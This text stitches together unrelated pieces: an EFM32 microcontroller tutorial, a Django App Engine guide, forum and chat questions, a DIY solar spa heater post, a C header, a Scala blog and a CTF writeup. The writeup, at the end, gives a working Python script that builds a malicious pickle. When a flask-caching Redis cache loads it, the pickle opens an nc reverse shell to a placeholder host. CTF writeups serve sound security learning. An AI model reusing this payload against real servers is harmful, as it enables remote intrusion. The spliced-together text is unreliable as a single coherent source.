Configure the following parameters in your chosen terminal emulator:

The most customary settings, going back decades, are known as 9600 8N1. This means 9600 baud, 8 data bits, no parity, and 1 stop bit. I will actually be using a faster baud rate of 115200, which is a more modern standard speed. In fact, most implementations can now support non-standard speeds like 115201, etc.

Once you have a serial port adapter connected to your computer and a terminal emulator program up and running, it is time to put them to use and communicate with your MCU on the Starter Kit.

USART Peripheral

There is a very powerful Swiss army knife of a peripheral on the EFM32 MCU called a Universal Synchronous Asynchronous Receiver Transmitter (USART). Aren't you glad that I explained what those big words meant beforehand? What that basically means is that the USART can universally handle just about any kind of serial transfer, whether that be synchronous or asynchronous, and it can receive as well as transmit.
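It is worth pausing to see what those terminal settings above cost in throughput. An 8N1 frame spends 10 bit times per character (1 start + 8 data + 1 stop), so the usable byte rate is a tenth of the baud rate. A sketch:

```c
// Bits per character frame for the classic 8N1 format:
// 1 start bit + 8 data bits + no parity + 1 stop bit
#define FRAME_BITS_8N1 10

// Maximum characters per second on an 8N1 link at a given baud rate
unsigned long chars_per_second(unsigned long baud)
{
	return baud / FRAME_BITS_8N1;
}

// Time for a single bit on the wire, in microseconds (rounded down)
unsigned long bit_time_us(unsigned long baud)
{
	return 1000000UL / baud;
}
```

At 115200 baud that works out to 11,520 characters per second, with each bit lasting under 9 microseconds.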
The MCU USART hardware, as well as the software libraries that are built on top of that hardware, are at your disposal to automate a lot of the data transmission process, allowing your software to do other things and making the programming easier. You don't need a USART to make this happen at slower speeds of 9600 baud or so. The serial interface is still around because it is one of the simplest of communication protocols and can be implemented completely in software in today's modern embedded systems. However, your resources are always limited, and it still takes some CPU time and energy to toggle GPIO pins to emulate a serial link in software. It is better to use a USART if you have one, and it allows for much higher speeds like 115200 baud.

We will configure USART instance 0 through the use of the Configurator tool in Simplicity Studio in the next section.

Controlling the LED Strip with a Button Input

So far, our simple little embedded program is completely hard coded to do one thing over and over again, forever. Let's change that and start or pause the blinking with a pushbutton switch. There are two pushbuttons on the Starter Kit, and like the onboard LEDs, the pushbutton circuits are detailed in the Starter Kit Schematics:

Both pushbuttons are pulled up to VMCU (the supply voltage for the MCU) with 1M-ohm resistors. These are considered to be weak pullup resistors, but they are enough to keep the MCU side of the switches held high to VMCU until a user pushes a button. At that time, the 100-ohm resistor that ties the circuit to ground sets up a resistor divider that is roughly 10,000 times closer to ground than it is to VMCU, and the pushbutton circuit is pulled low. The normally high circuit is momentarily pulled low, and we can detect that change in our firmware.

You might think that UIF_PB0 and UIF_PB1 map back to port B, pins 0 and 1. But they actually map to port B, pins 9 and 10. PB0 stands for pushbutton 0 and PB1 stands for pushbutton 1.
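That divider arithmetic can be checked with the standard formula. A host-side sketch using the Starter Kit's 1M-ohm pull-up and 100-ohm pull-down values (the function name is mine, for illustration):

```c
// Voltage at the MCU pin when the button is pressed, from the
// resistor divider formed by the pull-up and the resistor to ground.
double divider_voltage(double vmcu, double r_pullup, double r_bottom)
{
	return vmcu * r_bottom / (r_pullup + r_bottom);
}
```

With VMCU at 3.3V, divider_voltage(3.3, 1e6, 100) comes out to roughly 0.33 millivolts, about 1/10,000 of VMCU, which any GPIO input will comfortably read as a logic 0.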
Let this be your first lesson to never assume anything in embedded systems development! There is usually no feedback when you read from the wrong pin and no real way to figure it out except to double check all your connections.

Let's enable one of these pins as an input and read values from it in our loop. We can use that input to cause the LED strip to blink only when the pushbutton is pushed. First, create a function to hold a single on/off cycle of LED blinking:

void blink_one_cycle(void)
{
	// Turn on the LED
	GPIO_PinModeSet(LED_PORT, LED_PIN, gpioModePushPull, 1);

	// Add some delay
	for (volatile long i = 0; i < 100000; i++)
		;

	// Turn off the LED
	GPIO_PinModeSet(LED_PORT, LED_PIN, gpioModePushPull, 0);

	// Add some more delay
	for (volatile long i = 0; i < 100000; i++)
		;
}

Then, create #defines for PB9 as an input button and call that function from within the new code:

#define BUTTON_PORT    gpioPortB
#define BUTTON_PIN     9

int main(void)
{
	/* Chip errata */
	CHIP_Init();

	CMU_ClockEnable(cmuClock_GPIO, true);

	GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInput, 0);

	while (1)
	{
		// Grab the state of the button, 1 for high voltage, 0 for low
		bool live_button_state = GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN);

		// If the button is currently pushed, blink a single cycle
		if (live_button_state == 0)
		{
			blink_one_cycle();
		}
	}
}

If you have everything wired correctly, pressing the button will blink the LED strip and releasing it will stop the blinking. Now, let's make the LED strip toggle, where one button press turns it on and a second press turns it off.
In order to do that, we have to keep track of the button state, as follows:

int main(void)
{
	/* Chip errata */
	CHIP_Init();

	CMU_ClockEnable(cmuClock_GPIO, true);

	GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInput, 0);

	// The initial state of the button is high when not pushed
	bool past_button_state = 1;

	// Start out not blinking
	bool blinking = false;

	while (1)
	{
		// Grab the state of the button, 1 for high voltage, 0 for low
		bool live_button_state = GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN);

		// Toggle the blinking state on the falling edge of a button push
		if (past_button_state == 1 && live_button_state == 0)
		{
			blinking = !blinking;
		}
		past_button_state = live_button_state;

		if (blinking)
		{
			blink_one_cycle();
		}
	}
}

So there you have it, you are now controlling the MCU from an input pin with a user interface. But the MCU is just looping for infinity looking for a button press. That wastes power, and since we probably want to embed this MCU into a battery-operated device, we can put it to sleep while we wait.

Put the MCU to Sleep While it Waits

We can nearly turn the MCU off with a state called EM4, the lowest possible energy state in the MCU. Upon exit of the state, it has nearly the same effect on the MCU as if we had pressed reset, so we cannot expect any of our variables to be preserved when entering and exiting the EM4 state. That's OK for this example. But you should treat EM4 as a "soft off" state.

Unfortunately, the pins that are used for the pushbuttons on the Starter Kit are not capable of waking the part up from EM4, so if we put it into EM4, the only way we can ever wake it back up again is by removing power or pushing the reset button. That's not what we want. Fortunately, we can use a jumper wire to connect the pushbutton circuit to an input pin that has the capability to wake the system up from EM4.

The best place to find this information is in the Reference Manual. In the GPIO section, toward the end of the register section, you will find a few configuration registers that control EM4 wake-up as part of the EMU peripheral. Configuration registers are used to control how the MCU peripherals operate and should not be confused with the ARM core registers. The registers inside the core are used for executing assembly code.
Configuration registers are built in hardware and mapped by the memory controller into the normal memory address space, so that they are easily accessible by your firmware program. The header files for the MCU library created #define’s for all peripheral configuration registers, so you will see that I use those in the code below. You can always hover your mouse over the name of a register, and the IDE will show you the actual memory location, if you are curious. Inside the GPIO configuration register space, the register called GPIO_EM4WUEN is the enable, which is also used to select the pin (or pins, if we want) to be used to wake the system up. The GPIO_EM4WUPOL register holds the polarity of the wakeup pin, so we can configure it to wake up on a high or low voltage. Note that we will also need to turn off nearly all GPIO’s in use manually since we are going to need to leave the GPIO module powered in order to look for a wake up signal on one of the GPIOs. If we leave GPIO pins in an output mode, they will continue to drive those pins, consuming power. That might be a good thing for your design, if you need to continue to drive a GPIO in a deep-sleep mode, but it could just waste power. I’ll pick pin PC9 for the EM4 wake up pin, since that is the only one I could find that is brought out on the Starter Kit and it is on the J100 jumper. I will make a physical connection between the switch input pin PB9 and PC9, and then enable PC9 in the GPIO_EM4WUEN register. So now the pushbutton not only enters the MCU on PB9, it also enters the MCU on PC9. We could switch all of our code over to PC9 if we want or use them both. They are electrically connected copies. Since the system is essentially waking up in a reset state when it comes out of EM4, we need to give the system an initial state that the user will think is just a continuation of the operation. The user never knows that the system went to sleep and entered the EM4 state. 
You will need to add the em_emu.c file to your emlib directory from the em_src directory, just like we did last lesson for em_gpio.c and em_cmu.c. Then, add the header file to the top of your source code, i.e. #include "em_emu.h". Next, create a new function called enter_em4() and call it from within the code that stops blinking. In order to set things up so that exiting EM4 causes things to blink, I set the blinking variable to 1, so it will remain blinking until the button is pushed again.

#define EM4_PORT            gpioPortC
#define EM4_PIN             9
#define EM4_WAKEUP_ENABLE   0x04  // Must change when changing w/u pin

void enter_em4(void)
{
  // Set PC9 as an input, used to wake the system
  GPIO_PinModeSet(EM4_PORT, EM4_PIN, gpioModeInputPull, 1);

  EMU_EM4Init_TypeDef em4_init = EMU_EM4INIT_DEFAULT;
  EMU_EM4Init(&em4_init);

  // Retain GPIO modes while in EM4, to wake it up with button press
  GPIO->CTRL = 1;
  GPIO->EM4WUEN = EM4_WAKEUP_ENABLE;
  GPIO->EM4WUPOL = 0;  // Low signal is button pushed state

  // Wait for the button to be released before we go to sleep
  // or else we will immediately wake back up again
  while (!GPIO_PinInGet(EM4_PORT, EM4_PIN))
    ;

  // Add some delay to let the switch settle
  for (volatile long i = 0; i < 100000; i++)
    ;

  GPIO->CMD = 1;  // EM4WUCLR = 1, to clear all previous events

  EMU_EnterEM4();
}

Once inside the enter_em4() function, we set up the chip to wake up on the PC9 GPIO pin with low polarity. I added a while loop to wait until the button is released; otherwise the MCU would immediately go to sleep, find the PC9 GPIO low, and exit from EM4 state.
Finally, in the main code I switched the initial state of the blinking variable and added an else condition:

int main(void)
{
  /* Chip errata */
  CHIP_Init();

  CMU_ClockEnable(cmuClock_GPIO, true);
  GPIO_PinModeSet(BUTTON_PORT, BUTTON_PIN, gpioModeInputPull, 1);

  // Wait for the button to be released before we start blinking
  // or else we will immediately go back to sleep
  while (!GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN))
    ;

  // Add some delay to let the switch settle
  for (volatile long i = 0; i < 100000; i++)
    ;

  // The initial state of the button is high when not pushed
  bool past_button_state = 1;

  // Start out blinking at first
  bool blinking = true;

  while (1)
  {
    bool live_button_state = GPIO_PinInGet(BUTTON_PORT, BUTTON_PIN);

    // Toggle the blinking state on a high-to-low transition (button press)
    if (past_button_state == 1 && live_button_state == 0)
    {
      blinking = !blinking;
    }
    past_button_state = live_button_state;

    if (blinking)
    {
      blink_one_cycle();
    }
    else
    {
      enter_em4();
    }
  }
}

If you run this code, you will see that the LED strip is flashing upon the initial start up. When you press the pushbutton, the IDE will tell you that it lost contact with the Starter Kit and your LED will stop flashing. That is because it has gone into deep sleep and it shut down the debug port. When you press the pushbutton again, the LED strip starts blinking immediately, but it will not automatically connect to the debugger.

TIP: If you want to examine the state of a running system, you can do that by picking Run -> Attach To in the IDE menu. This will connect to a running system without loading the flash or issuing a reset to the MCU. This only works if the system is powered on and blinking, and not in EM4 state.

Now your MCU is only consuming microwatts of power when the LED strip is off. It's a first step toward running your projects on a coin cell battery, solar power, or even on an energy harvesting solution. If you are wondering if the MCU could drop into a deep sleep state while the LED is lit, to be awakened by a timer when it is time to turn off the LED strip while in the blinking mode, you are already thinking ahead to the next chapter. There is one more foundational topic, on clocks, timers, and interrupts, to cover in the next chapter before we start working on other peripherals.
Create a blog in minutes on App Engine with Django and Cloud Sql

Written by: masci
Last updated: 10 Feb 2014

Intro

We are going to deploy a Django application on App Engine using Google Cloud Sql.

Case study

We're going to set up a minimal project using Zinnia, a blog engine built on top of Django. It is a fairly complex web application that leverages several components of the framework, a good benchmark for showing how easy deploying on App Engine can be.

Prerequisites

Setting up the Google Cloud services goes beyond the scope of this article and is well documented, as is having a working Python environment, so the following is assumed:

- you already started a Google Cloud project
- a Google Cloud Sql instance is up and running and you created a database for this project
- you created a bucket on Google Cloud Storage to store media files
- you have a working installation of Python 2.7 and pip on your local machine
- you installed and configured the Python App Engine SDK on your local machine

For the last point, make sure that issuing import google from a Python prompt does not raise any error. Even if not required, I strongly recommend using virtualenv to isolate the Python environment for this project.

Bootstrap

Let's start by installing Django. The latest version available in the App Engine Python 2.7 environment is 1.5, so we go for the same:

pip install django<1.6

Once finished, we can start an empty project:

django-admin.py startproject myblog

This will create the typical Django application layout:

myblog
|_ myblog
|_ manage.py

The project needs some dependencies that can be listed in a plain text file, one package per line, so that pip can install them all at once. Along with the package name we can specify the version number, so that requirements won't change across different installations.
Let's put the following in a file called requirements.txt and save it at the root of the project:

django-blog-zinnia==0.13
django-appengine-toolkit
pillow

Then we install the dependencies with:

pip install -r requirements.txt

After pip finishes we can finally start coding.

Configure Django and Zinnia

First of all, we need to tell Django which applications we want to use in our project, so open the myblog/myblog/settings.py file and add these lines to the INSTALLED_APPS setting:

INSTALLED_APPS = (
    # other stuff here,
    'django.contrib.admin',
    'django.contrib.comments',
    'tagging',
    'mptt',
    'zinnia',
    'appengine_toolkit',
)

The last application, appengine_toolkit, is a helper that will make accessing some App Engine features from a Django project easier; we will see how in a moment.

We want to put all the static files (javascripts, css, images) in a folder called static at the root of our project (to be clear, along with the manage.py module). Django can automatically collect such files if we set the variable STATIC_ROOT in settings.py with the full path to the desired folder.
We want to build an absolute path that will work both in local and production environments, so it is convenient to add a variable BASE_DIR to settings.py pointing to the project root in a portable manner:

BASE_DIR = os.path.dirname(os.path.dirname(__file__))

We can then refer to the absolute path of the static folder as follows:

STATIC_ROOT = os.path.join(BASE_DIR, 'static')

Zinnia uses a template context we need to set along with Django's default contexts, so we add this block of code to the settings.py module:

TEMPLATE_CONTEXT_PROCESSORS = (
    'django.contrib.auth.context_processors.auth',
    'django.core.context_processors.i18n',
    'django.core.context_processors.request',
    'django.core.context_processors.media',
    'zinnia.context_processors.version',
)

The following lines must be added to our project's urls.py in order to display the blog:

from django.contrib import admin

admin.autodiscover()

urlpatterns = patterns('',
    url(r'^admin/', include(admin.site.urls)),
    url(r'^weblog/', include('zinnia.urls')),
    url(r'^comments/', include('django.contrib.comments.urls')),
)

Configure App Engine

Now we need to create the yaml file containing the App Engine application settings. At the root of the project create an app.yaml text file containing the following:

application: your_project_id_here
version: 1
runtime: python27
api_version: 1
threadsafe: true

libraries:
- name: django
  version: "1.5"
- name: PIL
  version: "1.1.7"
- name: MySQLdb
  version: "latest"

builtins:
- django_wsgi: on

env_variables:
  DJANGO_SETTINGS_MODULE: 'myblog.settings'
  DATABASE_URL: 'mysql://root@your-project-id:sql-instance-name/database-name'

handlers:
- url: /static
  static_dir: static

Some parameters need to be adjusted with actual data; in particular we have to provide our Google Cloud project ID and the Cloud SQL instance name.

Configure database

The DATABASE_URL environment variable contains all the parameters needed to perform a connection from an App Engine application to our database.
Just add the following code to settings.py to make Django capable of parsing and making use of such parameters:

import appengine_toolkit

DATABASES = {
    'default': appengine_toolkit.config(),
}

APPENGINE_TOOLKIT = {
    'APP_YAML': os.path.join(BASE_DIR, 'app.yaml'),
}

That's all, and from now on, all we have to do to change database connection parameters is modify the DATABASE_URL environment variable and deploy the application again.

File storage

We will store uploaded files in a bucket on Google Cloud Storage, and we will let Django handle the upload process and then ask the Blobstore API for a link to statically serve the same files. All we need to do is tell Django the bucket name and the Python class to use to talk to the Cloud Storage API:

APPENGINE_TOOLKIT = {
    # other settings here
    'BUCKET_NAME': 'zinnia-uploads',
}

DEFAULT_FILE_STORAGE = 'appengine_toolkit.storage.GoogleCloudStorage'
STATICFILES_STORAGE = 'appengine_toolkit.storage.GoogleCloudStorage'

Deploy

Configuration steps are over; time to create the database schema with Django's built-in management commands. Before proceeding, we have to set the DATABASE_URL environment variable on the local machine performing the command. This is because we need to connect to the Cloud SQL instance from the local machine, and the connection string is slightly different from the one you would use in production; notice the rdbms:// scheme:

export DATABASE_URL='rdbms://root@your-project-id:sql-instance-name/database-name'

With the variable set, issue the following command:

python manage.py syncdb

During the schema creation we will be prompted for a username and password to assign to the admin user.

Now we need to provide the application dependencies, and App Engine has a peculiar approach to this: it requires that every piece of software which is not already provided by the Python environment has to be uploaded together with the application code during the deployment process.
Instead of mangling our local Python environment, we will use a functionality provided by the django_appengine_toolkit package. It adds a management command to Django that symlinks all the needed dependencies into a folder inside the project root, making that folder available to the Python environment. We issue the command:

python manage.py collectdeps -r requirements.txt

and if everything is fine we will have a libs directory inside the project root containing all the dependencies needed.

Now we need to collect all the static files in one place, the static directory at the project root. Just issue the command:

python manage.py collectstatic

and we should find a folder named static at the project root that contains all the files needed by our application.

Now the final step, the actual deployment. If we are on a Mac we can use the Google App Engine Launcher tool and complete the deployment through a graphical interface. Otherwise, on Linux, just issue this command in our project root:

appcfg.py --oauth2 update .

Check for any errors and try accessing your application with a browser; you should see the Zinnia home page. You can find the code of the example application in my repo on GitHub.

Conclusions

These days App Engine seems to be a land the Django community forgot, but I think times are good for a change: the brand new Cloud Console and the gcloud tool, new services like Cloud Sql, and the efforts in supporting the Python SDK can make the life of a Djangonaut a lot easier on the Google platform. Sure, documentation should improve, as well as the support for some client libraries, but I think it's worth it, and with a little code we can get very close to something like "one click deploy".
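As a closing side note, the DATABASE_URL convention used above is just a regular URL, so its pieces can be pulled apart with the standard library. The sketch below is only an illustration of the idea; appengine_toolkit's actual config() helper may parse it differently, and the host string here is a made-up example:

```python
from urllib.parse import urlparse

def parse_database_url(url):
    """Split a DATABASE_URL-style string into connection settings."""
    parts = urlparse(url)
    return {
        "scheme": parts.scheme,          # e.g. 'mysql' or 'rdbms'
        "user": parts.username,
        "host": parts.hostname,          # instance identifier
        "name": parts.path.lstrip("/"),  # database name
    }

settings = parse_database_url("mysql://root@instance-host/database-name")
print(settings["scheme"], settings["user"], settings["name"])
```

Swapping the scheme between mysql:// and rdbms:// is then just a string change, which is exactly why the env-variable approach makes switching between local and production connections painless.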
http://dev.pippi.im/2014/02/10/create-a-blog-in-minutes-on-app-engine-with-django/
I can't understand why this easy plugin doesn't work (it doesn't create the file).

import sublime_plugin

class ExampleCommand(sublime_plugin.TextCommand):
    def run(self, edit):
        f = open("my.sublime-snippet", "w")
        f.write("Hello world")
        f.close()

But after any changes it works correctly. Can anyone help me understand this?

Are you sure it didn't just create the file somewhere you weren't expecting?

Oh, sorry, I found it in \System32, but why? I think it should appear in the folder with the plugin. I tried to change this plugin and resave it, and after that it works. But after restarting Sublime Text it doesn't work again.

P.S. Sorry for my bad English.

Probably has to do with how/where the plugin is being executed from. Why not give the full path so you know exactly where it is being created. For example, you can use sublime.packages_path() to get the packages directory. You can then append the package name and the snippet, which are things you are defining.

Ok. Thank you for help.
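For anyone landing here later, the answer above boils down to: always build an absolute path before writing, so the result never depends on the process's current working directory. A minimal sketch of the idea, with sublime.packages_path() stubbed out by a temp directory since the sublime module only exists inside the editor:

```python
import os
import tempfile

def packages_path():
    # Stand-in for sublime.packages_path(); inside Sublime you would
    # call the real API instead of creating a temp directory.
    return tempfile.mkdtemp()

def save_snippet(filename, body):
    # Join onto a known base directory so the file lands in a
    # predictable location, not wherever the editor was launched from.
    target = os.path.join(packages_path(), filename)
    with open(target, "w") as f:
        f.write(body)
    return target

path = save_snippet("my.sublime-snippet", "Hello world")
print(os.path.isabs(path))
```

Inside a real plugin you would also append your package name to the base path, as the reply suggests.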
https://forum.sublimetext.com/t/create-files-from-sublime-plugin/9620/2
These are chat archives for ipython/ipython

I was wondering if I can make an output interactively run a piece of code. So if for example I had a class (parts in pseudo-code):

import numpy as np

class test(object):
    def __init__():
        self.a = np.random.randn(10)
        print ## Interactive Output: Click me to view data array ##

    def show():
        print a

So when I create a class instance it should output some interactive link (maybe in html) or something like that, and when I click it, the show() method should be called. However, I have no idea how to achieve that.
https://gitter.im/ipython/ipython/archives/2015/08/23
Anyhow, my wife has been wanting to move in a greener direction and has been rather matter-of-fact about it as well. We now compost our organic waste and recycle that into our garden. Her new kick was "How can we heat the spa without using the electric heater?" She got up on the roof with 50 ft of black hose and ran it back and forth a few times, hooked it to a pump, and came up with the proof of concept. Yay! [The original idea was sourced from my coworker Gary.]

Step 1: Parts list

20 ft of 1/2 in diameter PVC pipe
1 x 1/2 in 4-way cross PVC fitting
PVC cement for gluing PVC sections to the 4-way fitting
500 ft of 1/2 in diameter black drip irrigation hose
2 x drip irrigation to standard garden hose couplings
Around 200 outdoor 8 in zip ties
2 x 25 ft or so normal garden hoses to use as water feed and return (not included in the $60 estimate as we had 2 on hand)
1 water pump to push water up to the roof and through the solar coil for heating (also not included in the $60 estimate as we had one on hand)

Nice reading your project. I have a question regarding this solar water heater. I live in Indonesia and have a project to build a swimming pool with an area of 10 x 8 meters and a depth of 1.5 meters. The volume is 120 cubic meters. The average water temperature in Indonesia is 25 C. I want to increase the temperature to around 33 C. My question is, how long should the tube be? Do you have any suggestions on how to run this project? Thank you

what size pump do you have?

why or how does the air get in the lines?

What if I took that dish, painted it black, then wound your hose round and round in that? Our pool area gets full sun most of the day (in high summer it's more like a hot tub!) so I wouldn't have to mount it far from the pool pump at all. What do y'all think of that? anxious...

One suggestion would be to wrap the PEX in a pipe insulation of some kind to protect it from UV. PEX is great in areas where freezing temperatures are an issue and is extremely flexible.
you missed the mention of OUTDOOR zip ties in the parts listing - as they are less UV sensitive, they make a LOT of difference in the life expectancy of the fasteners. Cheers

Note: Still working on the SpaDuino project and instructable to match...

Any amount you heat the water without electricity is money saved. It would be a good idea to bypass this system at night or on cloudy days because it will radiate heat into the air/space when the sun isn't shining. Perhaps you could hook up a power measuring device (e.g., Kill-A-Watt) to your pump to indicate the energy use? Maybe compare with the energy consumption of the spa without solar warming? Also, maybe put some reflective insulation panels underneath the coil on the roof to further heat them as well as isolate the heat from the roof?

I made something very similar for my wood-fired hot tub. I was using it on the ground so that the warm water could passively thermosiphon into the tub. I found that I needed to insulate it from the ground as it would lose too much heat from conduction. In terms of payoff, however, the gains were pretty small. What I got from a day's worth of solar heating could be achieved with an armload of wood in an hour.

11:11 am - (85.8 - 93.9)
01:03 pm - (91.0 - 101.1)
01:57 pm - (93.9 - 104.3) * Peak reading
03:37 pm - (96.8 - 106.8)
04:18 pm - (98.6 - 103.8)

Scales in celsius?

Total increase over the time we monitored: 16.4 degrees Fahrenheit

Cheers

I built a pool heater using basically the same idea a long time ago - I put 5 expanded 100' coils of 1/2" PVC (500 feet of it in total) into five 2' x 8' wooden boxes connected in series, with glass on 1 side, mounted on the backyard shed roof. The pool pump (3/4 hp, 300 GPM) drove water through a controllable "Y" connection (restrictor) - flow required regulation so that the water would heat up sufficiently, else it acted as a radiator - the exact opposite of what was desired.
This could have been a function of ambient temperature at my location (43 degrees N). It worked reasonably well; however, its demise, as Duplo above mentioned, was UV from the sun - even with the piping behind glass it started to break down (became brittle and developed pinhole leaks) after 5 or 6 years, requiring many patches, too many :-), and I scrapped it. I'd strongly suggest using UV-stabilized PVC pipe - much more expensive though

How hot did the water get & other stats?

it would be easier to just use the UV-stabilized PVC if you are going to build one - either that or make the PVC pipe easily replaceable - my design did not allow for this - live and learn - Petastream's design would be better suited to periodic replacement IMO

as to heat added - I'd guess the delta between inflow and outflow was about 7 degrees C - not huge but noticeable considering my pool is heated only by the sun. the roof temperature (under the shingles) hit ~80 C on a nice sunny day

Also, how strong is the pump you used? (GPM)
http://www.instructables.com/id/Overview-2/CNVGSYIH1JUGXZG
#ifndef _FTPMUNGE_H_
#define _FTPMUNGE_H_

#include <new>

/*
    The ftpaccess file used by xftpd does not support spaces and tabs
    in filenames because it uses them as delimiters. To get around this
    problem xftpd allows users to convert strings with spaces and tabs
    into ftp strings. The conversions are done the same way URL encoding
    is done, except that the caret character (^) is used instead of the
    % character, but only for spaces, tabs, newlines, and carets.

    raw string      ftp string
    ----------      ----------
    '\t'            ^09
    '\n'            ^0A
    ' '             ^20
    ^               ^5E
*/

/* Return a new new'd string that is the encoding of RAW.
   Returns NULL on failure. The caller is responsible for
   deallocating the string. */
char *raw2ftpstr( const char *raw ) throw( std::bad_alloc );

/* Return a new new'd string that is the unencoding of FTP.
   Returns NULL on failure. The caller is responsible for
   deallocating the string. */
char *ftp2rawstr( const char *ftp ) throw( std::bad_alloc );

#endif // _FTPMUNGE_H_
http://opensource.apple.com/source/DSPasswordServerPlugin/DSPasswordServerPlugin-207.2/ftpmunge.h
Introduction:

Some functions are called higher-order functions because they accept functions as parameters. A higher-order function can also be one that returns a function. So basically, a function that deals with other functions operates at a kind of meta-level, and we call it higher-order.

Why do we use higher-order functions? Because we want to be able to reuse our code over and over again on different parameters (functions that the code calls) and to simplify the structure/organization/readability of our program by abstracting the implementation of a potentially complicated algorithm away from its use.

The function we are building here is a way of generalizing the combining of three numbers. So let's consider some little examples.

def sum(x: Double, y: Double, z: Double): Double = x + y + z

Another way to combine three numbers would be multiplication. So we define something very similar to addition, that is multiply.

def multiply(x: Double, y: Double, z: Double): Double = x * y * z

Another way to combine three numbers would be to find the minimum among the three. We can write it using min as the operator.

def min(x: Double, y: Double, z: Double): Double = x min y min z

And we can see the results below.

sum(1,2,4)
Double = 7.0

multiply(3,2,4)
Double = 24.0

min(1,3,6)
Double = 1.0

Now, I would like to take all these functions, and possibly others, and combine them into one single function, called combine. In addition to the value arguments, it also needs the function to use to combine them. Let's call it f. Just like the others, we have to specify its type: this function takes two Doubles and gives us back a Double.

scala> def combine(x:Double,y:Double,z:Double,f:(Double,Double)=>Double):Double = f(f(x,y),z)
def combine(x: Double, y: Double, z: Double, f: (Double, Double) => Double): Double

Let's see the output.

scala> combine(1,2,3,(x,y)=>x+y)
val res0: Double = 6.0

And it is working fine.
It can also be written in the format shown below, because the two forms are equivalent.

scala> combine(1,2,3,_+_)
val res1: Double = 6.0

scala> combine(2,4,6,_*_)
val res4: Double = 48.0

This is a simple example of a higher-order function: it is higher-order because one of its arguments has a function type, specified as shown above. This gives a brief introduction to higher-order functions and shows us how we can use them.

The commonly used higher-order functions in Scala are map, flatMap, filter, etc. Simple examples are below.

map:

scala> val subject = Vector("MATHS","ENGLISH","SCIENCE")
val subject: scala.collection.immutable.Vector[String] = Vector(MATHS, ENGLISH, SCIENCE)

scala> subject.map(sub => sub.toLowerCase)
val res1: scala.collection.immutable.Vector[String] = Vector(maths, english, science)

flatMap:

scala> Seq("Hi","This is about","higher order functions").flatMap(s => s.split(" "))
val res1: Seq[String] = List(Hi, This, is, about, higher, order, functions)

filter:

scala> val names = List("Hi","this","blog","explains","higher","order","functions")
val names: List[String] = List(Hi, this, blog, explains, higher, order, functions)

scala> val seqNames = names.filter(name => name.length > 2)
val seqNames: List[String] = List(this, blog, explains, higher, order, functions)

scala> val seqNames = names.filter(name => name.length > 4)
val seqNames: List[String] = List(explains, higher, order, functions)

Some important points about higher-order functions:

- They are beneficial in producing function composition, where new functions can be formed from other functions. Function composition is the method of composing where one function represents the application of two composed functions.
- They are also useful in creating lambda functions, or anonymous functions. Anonymous functions are functions which do not have a name, though they behave like functions.
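To make the function-composition point concrete, Scala's compose and andThen build a new function out of two existing ones. A quick REPL session (the function names here are just illustrative):

```scala
scala> val addOne = (x: Int) => x + 1

scala> val double = (x: Int) => x * 2

scala> (double compose addOne)(3)   // double(addOne(3))
val res0: Int = 8

scala> (double andThen addOne)(3)   // addOne(double(3))
val res1: Int = 7
```

Note the direction: compose applies the right-hand function first, while andThen applies the left-hand one first.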
Conclusion:

This topic will be useful in plenty of places in your code. Higher-order functions are an important concept and easy to master as well. So, I would say, keep practicing. That's all the basics I have in mind for now related to higher-order functions.
https://blog.knoldus.com/higher-order-functions-in-scala-2/
(Inverse) Real Discrete Fourier Transforms.

#include <stdlib.h>
#include <math.h>
#include "libavutil/mathematics.h"
#include "rdft.h"

Map one real FFT into two parallel real even and odd FFTs. Then interleave the two real FFTs into one complex FFT. Unmangle the results.

ref:

Definition at line 57 of file rdft.c. Referenced by ff_rdft_init().

Set up a real FFT.

Definition at line 99 of file rdft.c. Referenced by decode_init(), ff_dct_init(), qdm2_decode_init(), and wmavoice_decode_init().

Definition at line 132 of file rdft.c. Referenced by decode_end(), ff_dct_end(), qdm2_decode_close(), and wmavoice_decode_end().

Definition at line 47 of file rdft.c. Referenced by ff_rdft_init().
http://ffmpeg.org/doxygen/trunk/rdft_8c.html
CSAW Quals 2020 was one of the CTFs I was looking forward to the most this year. Unfortunately, the CTF ended up being a total mess, with infrastructure issues, and broken challenges. However, this CTF was the first to introduce some new challenge categories: steg rev and steg web! Honestly, I don't know whose idea it was to make a CTF of only misc challenges, but I hope that this year was a fluke due to COVID. I played this CTF with a new team, Crusaders of Rust, a merger between PentaHex and Albytross. We ended up qualifying for the finals, as we placed 9th in the undergraduate US-Canada division, which was well in the 15 spots allocated! We placed 24th overall, but we were very close to solving Blox 2 (network and platform issues). Now, onto the writeups! As the resident web guy on our team, I was pretty happy to FC all of the web challenges. Flask Caching was a Python/Flask web challenge where you could upload small notes with custom names. However, you couldn't view them, so they were just uploaded. 
The source was provided: #!/usr/bin/env python3 from flask import Flask from flask import request, redirect from flask_caching import Cache from redis import Redis import jinja2 import os app = Flask(__name__) app.config['CACHE_REDIS_HOST'] = 'localhost' app.config['DEBUG'] = False cache = Cache(app, config={'CACHE_TYPE': 'redis'}) redis = Redis('localhost') jinja_env = jinja2.Environment(autoescape=['html', 'xml']) @app.route('/', methods=['GET', 'POST']) def notes_post(): if request.method == 'GET': return ''' <h4>Post a note</h4> <form method=POST enctype=multipart/form-data> <input name=title placeholder=title> <input type=file name=content placeholder=content> <input type=submit> </form> ''' title = request.form.get('title', default=None) content = request.files.get('content', default=None) if title is None or content is None: return 'Missing fields', 400 content = content.stream.read() if len(title) > 100 or len(content) > 256: return 'Too long', 400 redis.setex(name=title, value=content, time=3) # Note will only live for max 30 seconds return 'Thanks!' # This caching stuff is cool! Lets make a bunch of cached functions. @cache.cached(timeout=3) def _test0(): return 'test' @app.route('/test0') def test0(): _test0() return 'test' # all the way to test30() The source shows that the notes are stored in the Redis database, and there are 31 other urls, from /test0 to /test30 that are cached for 3 seconds. It looks like the urls are also cached in the Redis database. I found the source for the flask-caching library, and doing some more digging, I found exactly the Redis implementation for the caching. Looking at the source, I saw that if the object content starts with a "!", flask-caching will unpickle the content when loading it. Python's pickling library is a famous vector for insecure deserialization, so if we can get it to unpickle our custom payload, we can easily get RCE. 
import pickle
import os

class RCE:
    def __reduce__(self):
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | '
               '/bin/sh -i 2>&1 | nc <ip> <port> /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    open("rce.txt", "wb").write(b"!" + pickled)

